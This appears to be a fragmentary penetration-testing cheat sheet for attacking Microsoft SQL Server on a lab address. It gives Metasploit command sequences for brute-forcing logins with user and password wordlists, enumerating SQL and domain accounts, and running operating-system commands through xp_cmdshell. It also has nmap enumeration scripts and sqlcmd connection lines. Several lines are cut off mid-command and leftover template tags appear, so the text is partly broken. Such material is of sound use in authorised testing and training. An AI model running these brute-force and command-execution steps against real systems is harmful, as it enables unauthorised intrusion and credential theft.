#msfconsole -q msf> use auxiliary/scanner/mssql/mssql_login msf> set RHOSTS 10.10.10.50 msf> set USER_FILE /root/Desktop/wordlist/list_of_users.txt msf> set PASS_FILE /root/Desktop/wordlist/list_of_passwords.txt msf> set VERBOSE false msf> exploit
Enumerating logins:
#msfconsole -q msf> use auxiliary/admin/mssql/mssql_enum_sql_logins msf> set RHOSTS 10.10.10.50 msf> exploit
Enumerating all targets machine accounts:
#msfconsole -q msf> use auxiliary/admin/mssql/mssql_enum_domain_account msf> set RHOSTS 10.10.10.50 msf> exploit
Commands via xp_cmdshell:
#msfconsole -q msf> use auxiliary/admin/mssql/mssql_exec msf> set RHOSTS 10.10.10.50 msf> set CMD whoami msf> exploit
Use the command below to connect to your MSSQL server: mssql-cli -S <server URL> -d <database name> -U <username> -P <password>; Use the MSSQL-CLI to connect to the remote...
Run Nmap scripts to enumerate the Windows target machine MSSQL service. nmap -p1433 --script ms-sql-info 10.10.10.50 #get MYSQL info; nmap -p1433 --script ms-sql-ntlm-info --script-args mssql.ins...
SQLCMD: sqlcmd -S <server URL> -U <username> -P <password>; {% highlight terminal %} 1> select @@version 2> go 1> select db_name(); 2> go 1> select host_name(); 2...
kali command & paste
metasploit command & paste